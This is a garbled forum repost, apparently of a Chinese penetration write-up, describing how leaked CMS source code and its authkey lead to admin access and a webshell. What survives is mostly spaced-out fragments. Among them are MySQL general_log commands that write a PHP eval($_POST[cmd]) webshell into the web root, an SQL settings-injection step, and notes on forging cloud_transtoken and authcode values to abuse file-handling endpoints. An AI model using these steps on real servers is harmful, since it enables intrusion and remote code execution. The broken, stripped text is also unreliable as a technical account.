搜索

[21422] 2020-11-19_记一次从源代码泄漏到后台获取webshell的过程

文档创建者:s7ckTeam
浏览次数:40
最后更新:2025-01-18
2020-11-19_记一次从源代码泄漏到后台获取webshell的过程 w e b s h e l l L e m o n S e c   2 0 2 0 - 1 1 - 1 9 0 x 0 1   m a r r y c m s w e b s h e l l 0 x 0 2   W E B S H E L L 1 . s a l t f o r g e t . c t r l . p h p d a t a / b a c k u p i m s _ u s e r s p a s s w o r d
m d 5 a u t h k e y s a l t a u t h k e y $ p a s s w o r d   =   m d 5 ( $ p a s s w o r d   .   $ m e m b e r _ i n f o [ ' s a l t ' ]   .   $ _ W [ ' c o n f i g ' ] [ ' s e t t i n g ' ] [ ' a u t h k e y ' ] ) ; + s a l t + a u t h k e y d a t a / c o n f i g . p h p s a l t
使 w e b s h e l l s h e l l 2 . s h e l l c m s s h e l l s q l - - - s a l t a u t h k e y s a l t m d 5 ( $ p a s s . $ s a l t ) p p p p p p
s q l U P D A T E   i m s _ c o r e _ s e t t i n g s   S E T   v a l u e   =   r e p l a c e ( v a l u e ,   ' p p p p p p ' ,   ' p h p   ' ) a p a c h e 使 C O S s e r v e r T e n g i n e s q l s h e l l s h o w   v a r i a b l e s   l i k e   ' % g e n e r a l % ' ;     # s e t   g l o b a l   g e n e r a l _ l o g   =   o n ;     # g e n e r a l   l o g s e t   g l o b a l   g e n e r a l _ l o g _ f i l e   =   ' / v a r / w w w / h t m l / 1 . p h p ' ;       # s h e l l s e l e c t   ' < ? p h p   e v a l ( $ _ P O S T [ c m d ] ) ; ? > '     # s h e l l s l o w _ q u e r y _ l o g s h e l l s q l 0 x 0 3   1 . " * . p h p   " w e b / s o u r c e / c l o u d / d o c k . c t r l . p h p
B a s e 6 4 B a s e 6 4 w e b / s o u r c e / c l o u d / d o c k . c t r l . p h p d o w n l o a d $ d a t a $ d a t a $ r e t $ r e t [ ' f i l e ' ] $ f i l e g z c o m p r e s s g z u n c o m p r e s s g z u n c o m p r e s s $ f i l e
m d 5 m d 5 a u t h c o d e $ f i l e $ f i l e $ r e t [ ' p a t h ' ] $ _ W [ ' s e t t i n g ' ] [ ' s i t e ' ] [ ' t o k e n ' ] $ s t r i n g $ _ W [ ' s e t t i n g ' ] [ ' s i t e ' ] [ ' t o k e n ' ] $ s t r i n g $ r e t [ ' s i g n ' ] $ r e t [ ' p a t h ' ] $ _ W [ ' s e t t i n g ' ] [ ' s i t e ' ] [ ' t o k e n ' ] c a c h e _ l o a d ( c a c h e _ s y s t e m _ k e y ( ' c l o u d _ t r a n s t o k e n ' ) ) a u t h c o d e f r a m e w o r k / f u n c t i o n / g l o b a l . f u n c . p h p
使 a u t h k e y 2 . c l o u d _ t r a n s t o k e n a u t h c o d e $ G L O B A L S [ ' _ W ' ] [ ' c o n f i g ' ] [ ' s e t t i n g ' ] [ ' a u t h k e y ' ] d a t a / c o n f i g . p h p c a c h e _ s y s t e m _ k e y ( ' c l o u d _ t r a n s t o k e n ' ) f r a m e w o r k / m o d e l / c l o u d . m o d . p h p c l o u d _ b u i l d _ t r a n s t o k e n c a c h e _ w r i t e
c l o u d _ t r a n s t o k e n c l o u d _ t r a n s t o k e n c l o u d _ b u i l d _ t r a n s t o k e n
访 h t t p : / / i p : p o r t / w e b / i n d e x . p h p ? c = c l o u d & a = p r o f i l e   I D m e t h o d s h e l l 3 . c l o u d _ s i t e _ i n f o ( ) c l o u d _ s i t e _ i n f o ( ) c l o u d _ a p i ( ' s i t e / i n f o ' ) s i t e / i n f o c l o u d _ b u i l d _ t r a n s t o k e n c l o u d _ t r a n s t o k e n c l o u d _ t r a n s t o k e n
使 访 h t t p : / / i p : p o r t / w e b / i n d e x . p h p ? c = c l o u d & a = p r o f i l e   使 c l o u d _ t r a n s t o k e n c l o u d _ t r a n s t o k e n w e b / s o u r c e / s y s t e m / d a t a b a s e . c t r l . p h p
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理